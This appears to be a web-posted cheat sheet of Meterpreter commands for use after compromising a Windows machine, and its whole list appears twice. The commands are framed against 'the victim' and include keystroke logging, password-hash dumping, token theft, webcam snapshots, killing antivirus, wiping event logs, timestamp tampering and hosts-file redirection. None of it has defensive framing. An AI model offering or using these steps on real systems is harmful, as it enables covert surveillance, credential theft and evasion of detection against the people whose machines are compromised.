Some Important Meterpreter Commands after you exploited a machine
Meterpreter Commands
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm ------> checks to see if the victim is running a Virtual Machine or native.
3. route --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list -------> This shows you applications installed on the remotye PC
5. uictl ---------> Control Some of the User Interface Components
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.
8. getuid -------> This will show you the system identity and show you who you are running as such as system.
9. ps ------> This shows all the processes running on the victim as well as the PID's
10. run get_env -------> This willl give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts give you local system privelages
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c ------> Open a command prompt on a hidden channel.
18. interact 1 ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.
19. download -------> This command will download the specified command. "Example" download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e ------> this will enable remote desktop on the victim.
23. run gettelnet –e -------> To enable telnet on remote machine.
24. run getcountermeasure ------> checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc
25. run killav -------> it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.
26. run get_local_subnets ------> used to get the local subnet of the victim machine.
27. run hostedit -------> allows the attacker to add entries to the Windows host file. As a result of Windows checking the hosts file first, we can divert traffic to a fake entry
28. run remotewinenum -------> designed to enumerate the target system with the wmic command
30. run winenum -------> used for system enumeration. It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper --------> used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate --------> Migrate to Another Process such as explorer.exe so you don't loose your session.
33. cat -------> Read the Contents of a File to the Screen
34. background "or ctrl + z" --------> Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel -------> Displays Info About Active Channels
39. bgkill ---------> Kill a Background Meterpreter Script
40. close --------> Close a Channel
41. enumdesktops --------> List All Accessible Desktops and Window Stations
42. getdesktop -------> Get the Current Meterpreter Desktop
43. lpwd --------> Print Local Working Directory
44. ls --------> list Files
45. rm --------> Delete the Specified File
46. search --------> Search for Files.
47. upload ------> Upload File to Target
48. keyscan_start --------> Start Capturing Keystrokes
49. keyscan_stop Stop Capturing Keystrokes
49. keyscan_dump --------> Dump the Keystroke Buffer
50. screenshot --------> Screenshot of the GUI
51. setdesktop ---------> Change the Meterpreters Current Desktop.
52. getprivs ---------> Attempt to Enable All Privileges Available to the Current Process
53. kill --------> Terminate a Process "Example" kill 1834
54. reboot --------> Reboots the Remote Computer
55. reg ---------> Interact with the Remote Registry.
56. rev2self ---------> Calls RevertToSelf() on the Remote Machine
57. shell --------> Drop into a system shell.
58. shutdown --------> Shuts Down the Remote Computer
59. steal_token ------> Attempt to Steal an Impersonation Token from the Process
60. webcam_list --------> List webcams
61. webcam_snap -------> Take a snapshot from the specified webcam.
62. hashdump --------> Dumps the content of the SAM Database.
63. timestomp -------> Manipulates MACE Attributes
64. execute ------> Execute a command.
65. info --------> Display info about active post module.
66. quit --------> Terminate the meterpreter session.
67. getwd -------> Print Working Directory
68. mkdir -------> make directory.
69. pwd -------> print working directory.
70. drop_token -------> Relinquishes Any Active Impersonation Token
71. rmdir --------> remove directory.
72. del -------> delete file "exmple" del passwords.txt
1. sysinfo -----> shows the system build x86 or x64, language version, build...etc
2. run checkvm ------> checks to see if the victim is running a Virtual Machine or native.
3. route --------> Dumps the routing table to the screen and shows how the subnet has been configured...etc
4. run get_application_list -------> This shows you applications installed on the remotye PC
5. uictl ---------> Control Some of the User Interface Components
6. idletime -----> shows how long the victim has not been active on the computer.
7. getpid ---------> This is to get the process ID and shows the process of which you are currently running off of.
8. getuid -------> This will show you the system identity and show you who you are running as such as system.
9. ps ------> This shows all the processes running on the victim as well as the PID's
10. run get_env -------> This willl give you a lot of info on the system
11. ifconfig and ipconfig -----> Find out the IPaddress and see how many adapters are enabled.
12. ? ------> Shows a list of different commands.
13. getsystem -----> attempts give you local system privelages
14. reboot ------> Reboot the remote machine
15. sc config process_name start= disabled --------> stops a process from starting on next system reboot "process_name" is the name of the proces you want to disable.
16. clearev -------> Wipes all event logs.
17. execute -f cmd.exe -H -c ------> Open a command prompt on a hidden channel.
18. interact 1 ------> interact with a channel "1" will be replaced with the chgannel you want to interact with.
19. download -------> This command will download the specified command. "Example" download c:\\boot.ini
20. upload --------> upload files to the victim machine
21. portfwd ------> forward a local port to a remote service
22. run getgui -e ------> this will enable remote desktop on the victim.
23. run gettelnet –e -------> To enable telnet on remote machine.
24. run getcountermeasure ------> checks the security configuration on the exploited machine and it can disable countermeasures such as AV, firewalls, etc
25. run killav -------> it is designed to kill most AVs that are running as a service on the exploited machine. Works on sum but not all AV's.
26. run get_local_subnets ------> used to get the local subnet of the victim machine.
27. run hostedit -------> allows the attacker to add entries to the Windows host file. As a result of Windows checking the hosts file first, we can divert traffic to a fake entry
28. run remotewinenum -------> designed to enumerate the target system with the wmic command
30. run winenum -------> used for system enumeration. It will dump tokens, hashes, and issue both net and wmic commands
31. run scraper --------> used for grabbing additional system information not included in the other system enumerating scripts, such as the “entire registry.”
32. migrate --------> Migrate to Another Process such as explorer.exe so you don't loose your session.
33. cat -------> Read the Contents of a File to the Screen
34. background "or ctrl + z" --------> Background the Current Session
35. irb -------> Drop into irb Scripting Mode
36. interact --------> Interact with a Channel
37. load ------> Load One or More Meterpreter Extensions.
38. channel -------> Displays Info About Active Channels
39. bgkill ---------> Kill a Background Meterpreter Script
40. close --------> Close a Channel
41. enumdesktops --------> List All Accessible Desktops and Window Stations
42. getdesktop -------> Get the Current Meterpreter Desktop
43. lpwd --------> Print Local Working Directory
44. ls --------> list Files
45. rm --------> Delete the Specified File
46. search --------> Search for Files.
47. upload ------> Upload File to Target
48. keyscan_start --------> Start Capturing Keystrokes
49. keyscan_stop Stop Capturing Keystrokes
49. keyscan_dump --------> Dump the Keystroke Buffer
50. screenshot --------> Screenshot of the GUI
51. setdesktop ---------> Change the Meterpreters Current Desktop.
52. getprivs ---------> Attempt to Enable All Privileges Available to the Current Process
53. kill --------> Terminate a Process "Example" kill 1834
54. reboot --------> Reboots the Remote Computer
55. reg ---------> Interact with the Remote Registry.
56. rev2self ---------> Calls RevertToSelf() on the Remote Machine
57. shell --------> Drop into a system shell.
58. shutdown --------> Shuts Down the Remote Computer
59. steal_token ------> Attempt to Steal an Impersonation Token from the Process
60. webcam_list --------> List webcams
61. webcam_snap -------> Take a snapshot from the specified webcam.
62. hashdump --------> Dumps the content of the SAM Database.
63. timestomp -------> Manipulates MACE Attributes
64. execute ------> Execute a command.
65. info --------> Display info about active post module.
66. quit --------> Terminate the meterpreter session.
67. getwd -------> Print Working Directory
68. mkdir -------> make directory.
69. pwd -------> print working directory.
70. drop_token -------> Relinquishes Any Active Impersonation Token
71. rmdir --------> remove directory.
72. del -------> delete file "exmple" del passwords.txt